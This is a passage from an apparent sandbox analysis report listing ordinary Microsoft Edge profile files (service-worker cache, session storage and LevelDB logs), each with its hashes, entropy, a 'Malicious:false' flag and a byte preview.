                                                                                                                                                                                                                                                                                SHA-512:BE077F6FD78008504EFEACE686413FC35850B241279EAA4D422D65945C90E25133FAD07839265A61255E0315594E637150D84D2F1393E19AFA3E2099FB46EE48
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2.....................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true .(.0.8.......@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h..h.!p.x................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableE

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):297
                                                                                                                                                                                                                                                                                Entropy (8bit):5.168261967721409
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:iOvWh1wkn23oH+TcwtE/a252KLlNWVy9yq2Pwkn23oH+TcwtE/a2ZIFUv:7zfYeb8xLOyAvYfYeb8J2FUv
                                                                                                                                                                                                                                                                                MD5:7F2540BA033CA4495A1955951387A75D
                                                                                                                                                                                                                                                                                SHA1:E5FAD705DCECBEBAD828524D818538FEF2CA69FD
                                                                                                                                                                                                                                                                                SHA-256:95895968A2F94B82F3A79E7398BD7D8B57A089C5F3DA3920214DF947FD4792E9
                                                                                                                                                                                                                                                                                SHA-512:0F6E97052D2B575B62FE0606CC7A5BA361143E406F448A5030DE2439A8CC20841D4F0D7303B75EC8D42C95C79E6F7B193CD3E3357A391D63D9D15F8B3ADEA89F
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:52:50.927 2270 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2025/03/08-18:52:50.940 2270 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):117676
                                                                                                                                                                                                                                                                                Entropy (8bit):5.576432604598871
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:Zx906yxPXfO4O1ppoe4ML/NHHNeeEMCjP+N7hQPvWl2FI:j9LyxPXfO4O1pue4ML/VNeeEMrWvO
                                                                                                                                                                                                                                                                                MD5:D2ED25003EE377CCB93AE3C3829FF2DD
                                                                                                                                                                                                                                                                                SHA1:7AF9D1AD46FA40F2C3520E6533DDF939A300FE86
                                                                                                                                                                                                                                                                                SHA-256:6DBFAF4E6D4833973DB17E10150A2F62FBAE50469F1CB85BE3723F5AD529F9C0
                                                                                                                                                                                                                                                                                SHA-512:A02CA0ED138DFFD126BAF5B818FC9EBB1503369456E15520768746FC4B2AF6A59273BD10CA12BDCC91EBF064BEA107B6091B366B514D550EB2908A69481F2BB4
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):196361
                                                                                                                                                                                                                                                                                Entropy (8bit):6.388586918343125
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3072:ZEC5SmVPU0wsL21iLL/R4HGIsKG/SRDqYzwAX22fCUG2HL2vpRpFi9oev1N14ucb:1W0wJ1GL/amIm/6ZY
                                                                                                                                                                                                                                                                                MD5:E725A7F5C72311C999F1A41726BD66F3
                                                                                                                                                                                                                                                                                SHA1:5FE908277EC0AEAFBD0D3438D3E01C09F23D7071
                                                                                                                                                                                                                                                                                SHA-256:B0AA7C8E6AA53D9C36D7EFDA97774F8FB83E2B4963EDC4D7F940FD5424009274
                                                                                                                                                                                                                                                                                SHA-512:4EA9E37948A8732C7B3B5CF1A9076D9EA9C512884D454C1B6EEFB8E22415CEABD064F0A367214DEE31817DEC8711E36C9F2FDD0D1C5B3B82BF5352CEA0524ECC
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:0\r..m..........rSG.....0....Lp.................;.......*.........,T.8..`,.....L`.....,T...`......L`......Rc..:.....exports...Rc........module....Rc.U......define....RbfX......amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H........Q....../{...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true.a........Db............D`........A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da....rs...,T.`.`z.....L`..........a............a.........Dr8..............

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):24
                                                                                                                                                                                                                                                                                Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:0\r..m..................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):72
                                                                                                                                                                                                                                                                                Entropy (8bit):3.5931902015385067
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:y0AyXl/lw/l9/lxEstllI/lXDy+n:y0jQOs2++
                                                                                                                                                                                                                                                                                MD5:22C8D902F180D3A7CD59B5E5F37A6424
                                                                                                                                                                                                                                                                                SHA1:EECB57C42048245824589A52250DBF0B66695F9A
                                                                                                                                                                                                                                                                                SHA-256:ECE42C80A3D41203CAABC2CD97F60FCD24A5EA2B531ED9F776B7776B02D8C5BD
                                                                                                                                                                                                                                                                                SHA-512:B9921F714E53EEB7DE1B422195D408510FCB7E9A60E19C5540463E97FB9EEEAA8696DAD3C71C217129E09D44A058252F8F080CDED21DCCC15C4C4921341E60F8
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:@...G9.Doy retne.........................X....,................h...s./.

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):72
                                                                                                                                                                                                                                                                                Entropy (8bit):3.5931902015385067
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:y0AyXl/lw/l9/lxEstllI/lXDy+n:y0jQOs2++
                                                                                                                                                                                                                                                                                MD5:22C8D902F180D3A7CD59B5E5F37A6424
                                                                                                                                                                                                                                                                                SHA1:EECB57C42048245824589A52250DBF0B66695F9A
                                                                                                                                                                                                                                                                                SHA-256:ECE42C80A3D41203CAABC2CD97F60FCD24A5EA2B531ED9F776B7776B02D8C5BD
                                                                                                                                                                                                                                                                                SHA-512:B9921F714E53EEB7DE1B422195D408510FCB7E9A60E19C5540463E97FB9EEEAA8696DAD3C71C217129E09D44A058252F8F080CDED21DCCC15C4C4921341E60F8
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:@...G9.Doy retne.........................X....,................h...s./.

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF2d344.TMP (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):72
                                                                                                                                                                                                                                                                                Entropy (8bit):3.5931902015385067
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:y0AyXl/lw/l9/lxEstllI/lXDy+n:y0jQOs2++
                                                                                                                                                                                                                                                                                MD5:22C8D902F180D3A7CD59B5E5F37A6424
                                                                                                                                                                                                                                                                                SHA1:EECB57C42048245824589A52250DBF0B66695F9A
                                                                                                                                                                                                                                                                                SHA-256:ECE42C80A3D41203CAABC2CD97F60FCD24A5EA2B531ED9F776B7776B02D8C5BD
                                                                                                                                                                                                                                                                                SHA-512:B9921F714E53EEB7DE1B422195D408510FCB7E9A60E19C5540463E97FB9EEEAA8696DAD3C71C217129E09D44A058252F8F080CDED21DCCC15C4C4921341E60F8
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:@...G9.Doy retne.........................X....,................h...s./.

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):5267
                                                                                                                                                                                                                                                                                Entropy (8bit):3.457115241771213
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:96:z7R3H9xePoVT76n74rSpPwp+++ViNhekYZ0/gtOhMO42OjWL:z7RqPoVT76n74WSp++KiDekk0/gtoFO6
                                                                                                                                                                                                                                                                                MD5:B4D85D3C6B5432033C6E58E1AA7502D9
                                                                                                                                                                                                                                                                                SHA1:52C29FA2E3B50C179A037730B7273DC87AFE5B2F
                                                                                                                                                                                                                                                                                SHA-256:8FA2ACA2D0F0F9783DF063F9970306EA0FAA71AC1C633B8D6C362EDB521B34A6
                                                                                                                                                                                                                                                                                SHA-512:D30E865427EA1B03B9112C263E4778DA8F2CB9D4B4BF496A598484B08D8703C11D32BC477AC10A5CC39041BFEE66B377077F42AD47C59157B84EC0EF98EF42B2
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................&f.................&f...............:.."b................next-map-id.1.Cnamespace-bfa9bf6f_2177_455d_9d11_fd70f92a238a-https://ntp.msn.com/.0V.e................V.e................V.e................V.e.................gh.(................map-0-shd_sweeper.%{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.1.s.w.-.c.c.-.c.a.l.f.b.v.c.,.p.r.g.-.1.s.w.-.s.a.-.c.a.l.f.b.v.c.,.c.-.p.r.g.-.m.s.n.-.b.l.s.b.i.d.m.h.o.,.c.-.p.r.g.-.c.h.-.l.s.b.t.w.k.1.,.p.r.g.-.a.d.-.s.t.a.b.-.b.n.,.p.r.g.-.s.t.a.b.-.b.n.,.p.r.g.-.u.p.d.a.t.e.-.h.i.d.e.,.p.r.g.-.1.s.w.-.s.a.e.n.g.a.g.e.m.o.d.e.l.i.1.t.6.,.p.r.g.-.1.s.w.-.s.a.g.e.v.i.1.f.,.p.r.g.-.c.g.p.1.-.u.x.c.f.,.1.s.-.u.n.c.l.k.-.a.n.m.t.i.o.n.-.1.d.,.1.s.-.u.n.c.l.k.-.a.n.m.t.

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):322
                                                                                                                                                                                                                                                                                Entropy (8bit):5.10305897445124
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:iOvWMUN+q2Pwkn23oH+TcwtrQMxIFUtdWMbZZmwrWM+FXXtVkwOwkn23oH+Tcwtf:7hUIvYfYebCFUt7V/9+tD5JfYebtJ
                                                                                                                                                                                                                                                                                MD5:A4B0060101F0A7825A31267168115DB4
                                                                                                                                                                                                                                                                                SHA1:CF2E3AABEC6DC95FAE83BCB455F470C8C3B89DF8
                                                                                                                                                                                                                                                                                SHA-256:2B4CBC3B419BE2C5CB8FF1A5E58757AFB1F10A86A83628E3E1AA0B57D3A20BDC
                                                                                                                                                                                                                                                                                SHA-512:72CD1B6BE751C479FB0A7C2779285B498CD29F906D67CE8ABE7B9B161D8AE0AB9CC01BE0CFEFD04C08FFF67F4D473350C98B95FB2C928D07BE86BC74FAD79854
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:52:29.803 2358 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/03/08-18:52:29.808 2358 Recovering log #3.2025/03/08-18:52:29.810 2358 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):322
                                                                                                                                                                                                                                                                                Entropy (8bit):5.10305897445124
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:iOvWMUN+q2Pwkn23oH+TcwtrQMxIFUtdWMbZZmwrWM+FXXtVkwOwkn23oH+Tcwtf:7hUIvYfYebCFUt7V/9+tD5JfYebtJ
                                                                                                                                                                                                                                                                                MD5:A4B0060101F0A7825A31267168115DB4
                                                                                                                                                                                                                                                                                SHA1:CF2E3AABEC6DC95FAE83BCB455F470C8C3B89DF8
                                                                                                                                                                                                                                                                                SHA-256:2B4CBC3B419BE2C5CB8FF1A5E58757AFB1F10A86A83628E3E1AA0B57D3A20BDC
                                                                                                                                                                                                                                                                                SHA-512:72CD1B6BE751C479FB0A7C2779285B498CD29F906D67CE8ABE7B9B161D8AE0AB9CC01BE0CFEFD04C08FFF67F4D473350C98B95FB2C928D07BE86BC74FAD79854
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:52:29.803 2358 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/03/08-18:52:29.808 2358 Recovering log #3.2025/03/08-18:52:29.810 2358 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13385951551391722

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):1443
                                                                                                                                                                                                                                                                                Entropy (8bit):3.8371588992608796
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:3lBssEdJuPS1psAF4unxl00EtLp3X2amEtG1ChqC+A9sIZUaQKkOAM4A:3FEdJu61zFELp2FEkChJ+DsUbHOpV
                                                                                                                                                                                                                                                                                MD5:66627E6C483326DE8ABFF569F5D9117B
                                                                                                                                                                                                                                                                                SHA1:1631E5D9110D44E819ED744185B3D8964920D5E2
                                                                                                                                                                                                                                                                                SHA-256:103DB339ABD7EF203E1D063CF795F0092A5D65CF9522F016AE1B84299930C7A2
                                                                                                                                                                                                                                                                                SHA-512:2077FCD3EA187AD0469A8DB7AC9778CF1DD42DA604BBD11842AB5F7CCE68E701158CF96AB3831EB60DB72974F9FCED932796C47D615C034FE8C7F49EB7827EA6
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:SNSS........V..............V........".V..............V..........V..........V..........V......!...V..................................V...V..1..,....V..$...bfa9bf6f_2177_455d_9d11_fd70f92a238a....V..........V......2.W.........V......V..........................V......................5..0....V..&...{6EDED7FE-60E2-427F-A578-9758204D4AA7}......V.............V..........................V..............V..........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.......yx.n./..zx.n./.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):350
                                                                                                                                                                                                                                                                                Entropy (8bit):5.175825794919328
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:iOvWMxq2Pwkn23oH+Tcwt7Uh2ghZIFUtdWMZZmwrWMzkwOwkn23oH+Tcwt7Uh2gd:7hxvYfYebIhHh2FUt7Z/9z5JfYebIhHd
                                                                                                                                                                                                                                                                                MD5:16385256B89774195EB71A6AE02C1149
                                                                                                                                                                                                                                                                                SHA1:62B565C72D88AE0B091FA51011DB5F0D24FACA05
                                                                                                                                                                                                                                                                                SHA-256:D9252A8896B75E8B1097B31616CF472A72F9940F83C2662052337DAC7218F275
                                                                                                                                                                                                                                                                                SHA-512:8C86051282E4170C0637B80703B9A2D1988ED38EA9F1519C8B1E6BBE880A32CE96FFD88918F5FCEDEA4288B91AF8D98080A350EF07B689E83AE231E56BA4D077
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:52:29.065 22b4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/03/08-18:52:29.066 22b4 Recovering log #3.2025/03/08-18:52:29.066 22b4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):350
                                                                                                                                                                                                                                                                                Entropy (8bit):5.175825794919328
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:iOvWMxq2Pwkn23oH+Tcwt7Uh2ghZIFUtdWMZZmwrWMzkwOwkn23oH+Tcwt7Uh2gd:7hxvYfYebIhHh2FUt7Z/9z5JfYebIhHd
                                                                                                                                                                                                                                                                                MD5:16385256B89774195EB71A6AE02C1149
                                                                                                                                                                                                                                                                                SHA1:62B565C72D88AE0B091FA51011DB5F0D24FACA05
                                                                                                                                                                                                                                                                                SHA-256:D9252A8896B75E8B1097B31616CF472A72F9940F83C2662052337DAC7218F275
                                                                                                                                                                                                                                                                                SHA-512:8C86051282E4170C0637B80703B9A2D1988ED38EA9F1519C8B1E6BBE880A32CE96FFD88918F5FCEDEA4288B91AF8D98080A350EF07B689E83AE231E56BA4D077
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:52:29.065 22b4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/03/08-18:52:29.066 22b4 Recovering log #3.2025/03/08-18:52:29.066 22b4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

